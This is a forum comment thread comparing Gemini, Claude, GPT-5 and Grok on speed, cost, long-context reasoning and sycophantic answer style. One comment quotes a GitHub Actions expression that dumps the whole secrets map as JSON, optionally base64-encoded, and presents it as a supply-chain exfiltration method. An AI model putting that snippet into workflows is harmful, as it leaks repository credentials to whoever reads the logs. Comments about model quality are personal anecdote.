top | item 45376536

(no title)

Google seems to be the main foundation model provider that's really focusing on the latency/TPS/cost dimensions. Anthropic/OpenAI are really making strides in model intelligence, but underneath some critical threshold of performance, the really long thinking times make workflows feel a lot worse in collaboration-style tools, vs a much snappier but slightly less intelligent model.

It's a delicate balance, because these Gemini models sometimes feel downright lobotomized compared to claude or gpt-5.

discuss

omarspira|5 months ago

I would be surprised if this dichotomy you're painting holds up to scrutiny.

My understanding is Gemini is not far behind on "intelligence", certainly not in a way that leaves obvious doubt over where they will be over the next iteration/model cycles, where I would expect them to at least continue closing the gap. I'd be curious if you have some benchmarks to share that suggest otherwise.

Meanwhile, afaik something Google has done, and perhaps relates back to your point re "latency/TPS/cost dimensions" that other providers aren't doing as much is integrating their model into interesting products beyond chat, at a pace that seems surprising given how much criticism they had been taking for being "slow" to react to the LLM trend.

Besides the Google Workspace surface and Google search, which now seem obvious - there are other interesting places where Gemini will surface - https://jules.google/ for one, to say nothing of their experiments/betas in the creative space - https://labs.google/flow/about

Another I noticed today: https://www.google.com/finance/beta

I would have thought putting Gemini on a finance dashboard like this would be inviting all sorts of regulatory (and other) scrutiny... and wouldn't be in keeping with a "slow" incumbent. But given the current climate, it seems Google is plowing ahead just as much as anyone else - with a lot more resources and surface to bring to bear. Imagine Gemini integration on Youtube. At this point it just seems like counting down the days...

CuriouslyC|5 months ago

I do scientific and hard code a lot. Gemini is a good bit below GPT5 in those areas, though still quite good. It's also just a bad agent, it lacks autonomy and isn't RL'd to explore well. Gemini's superpower is being really smart while also having by far the best long context reasoning, use it like an oracle with bundles of your entire codebase (or a subtree if it's too big) to guide agents in implementation.

cerved|5 months ago

Yesterday I asked Gemini to recalculate the timestamps of tasks in a sequence of tasks, given it's duration and the previous timestamp. It proceeded to write code which gave results like this

  2025-09-26T14:32:10Z
  2025-09-26T14:32:10Z200s
  2025-09-26T14:32:10Z200s600s
  2025-09-26T14:32:10Z200s600s300s

It then proceeded to talk about how efficient this approach was for thousands of numbers.

Gemini is by far the dumbest LLM I've used

ainch|5 months ago

Gemini 2.5-Pro was great when it released, but o3 and GPT-5 both eclipsed it for me—the tool use/search improvements open up so many use cases that Gemini fails at.

perfmode|5 months ago

How’d I never hear of Jules? Cool.

Al-Khwarizmi|5 months ago

And yet my smart speakers with the Google assistant still default to a dumb model from the pre-LLM era (although my phone's version of the assistant does call Gemini). I wonder why that is, as it would be an obvious place to integrate Gemini. The bar is very very low as anything outside the standard setting alarms, checking the weather, etc. it gets wrong most of the time.

jjani|5 months ago

Can't agree with that. Gemini doesn't lead just on price/performance - ironically it's the best "normie" model most of the time, despite it's lack of popularity with them until very recent.

It's bad at agentic stuff, especially coding. Incomparably so compared to Claude and now GPT-5. But if it's just about asking it random stuff, and especially going on for very long in the same conversation - which non-tech users have a tendency to do - Gemini wins. It's still the best at long context, noticing things said long ago.

Earlier this week I was doing some debugging. For debugging especially I like to run sonnet/gpt5/2.5-pro in parallel with the same prompt/convo. Gemini was the only one that, 4 or so messages in, pointed out something very relevant in the middle of the logs in the very first message. GPT and Sonnet both failed to notice, leading them to give wrong sample code. I would've wasted more time if I hadn't used Gemini.

It's also still the best at a good number of low-resource languages. It doesn't glaze too much (Sonnet, ChatGPT) without being overly stubborn (raw GPT-5 API). It's by far the best at OCR and image recognition, which a lot of average users use quite a bit.

Google's ridiculously bad at marketing and AI UX, but they'll get there. They're already much more than just a "bang for the buck" player.

FWIW I use all 3 above mentioned on a daily basis for a wide variety of tasks, often side-by-side in parallel to compare performance.

breakingcups|5 months ago

My pet theory without any strong foundation is because OpenAI and Anthropic have trained their models really hard to fit the sycophantic mold of:

    ===============================
    Got it — *compliment on the info you've shared*, *informal summary of task*. *Another compliment*, but *downside of question*.
    ----------
    (relevant emoji) Bla bla bla
    1. Aspect 1
    2. Aspect 2
    ----------

    *Actual answer*

    -----------
    (checkmark emoji) *Reassuring you about its answer because:*

    * Summary point 1
    * Summary point 2
    * Summary point 3

    Would you like me to *verb* a ready-made *noun* that will *something that's helpful to you 40% of the time*?
    ===============================

It's gotta reduce the quality of the answers.

BeetleB|5 months ago

I recently started using Open WebUI, which lets you run your query on multiple models simultaneously. My anecdote: For non-coding tasks, Gemini 2.5 Pro beats Sonnet 4 handily. It's a lot more common to get wrong/hallucinated content from Sonnet 4 than Gemini.

mcintyre1994|5 months ago

Google also has a lot of very useful structured data from search that they’re surely going to figure out how to use at some point. Gemini is useless at finding hotels, but it says it’s using Google’s Hotel data, and I’m sure at some point it’ll get good at using it. Same with flights too. If a lot of LLM usage is going to be better search, then all the structured data Google have for search should surely be a useful advantage.

dpoloncsak|5 months ago

Does it still try to 'unplug' itself if it gets something wrong, or did they RL that out yet?

oasisbob|5 months ago

> because these Gemini models sometimes feel downright lobotomized compared to claude or gpt-5.

I'm using Gemini (2.5-pro) less and less these days. I used to be really impressived with its deep research capabilities and ability to cite sources reliably.

The last few weeks, it's increasingly argumentative and incapable of recognizing hallucinations around sourcing. I'm tired of arguing with it on basics like RFCs and sources it fabricates, won't validate, and refuses to budge on.

Example prompt I was arguing with it on last night:

> within a github actions workflow, is it possible to get access to the entire secrets map, or enumerate keys in this object?

As recent supply-chain attacks have shown, exfiltrating all the secrets from a Github workflow is as simple as `${{ toJSON(secrets) }}` or `echo ${{ toJSON(secrets) }} | base64` at worse. [1]

Give this prompt a shot! Gemini won't do anything except be obstinately ignorant. With me, it provided a test case workflow, and refused to believe the results. When challenged, expect it to cite unrelated community posts. Chatgpt had no problem with it.

[1] https://github.com/orgs/community/discussions/174045 https://github.com/orgs/community/discussions/47165

istjohn|5 months ago

You should never argue with an LLM. Adjust the original prompt and rerun it.

mips_avatar|5 months ago

IMO the race for Latency/TPS/cost is entirely between grok and gemini flash. No model can touch them (especially for image to text related tasks), openai/anthropic seem entirely uninterested in competing for this.

CuriouslyC|5 months ago

grok-4-fast is a phenomenal agentic model, and gemini flash is great for deep research leaf nodes since it's so cheap, you can segment your context a lot more than you would for pro to ensure it surfaces anything that might be valuable.

baby|5 months ago

Agree, Gemini is soooooo freaking fast, but I rarely use it personally because Anthropic/OpenAI model have such a better output

ta12653421|5 months ago

10 years ago: "before you marry someone, put the person in front of a really slow internet connection"

today: "before you marry someone, put the person in front of a slow AI model"

;-)

kanwisher|5 months ago

We had to drop Gemini api cause it was so unreliable in production, no matter how long you waited.

simianwords|5 months ago

The other day I heard gpt-5 was really an efficiency update

M4v3R|5 months ago

It was both efficiency and knowledge/reasoning update. GPT-5 excels at coding, it solves tasks the previous versions just could not do.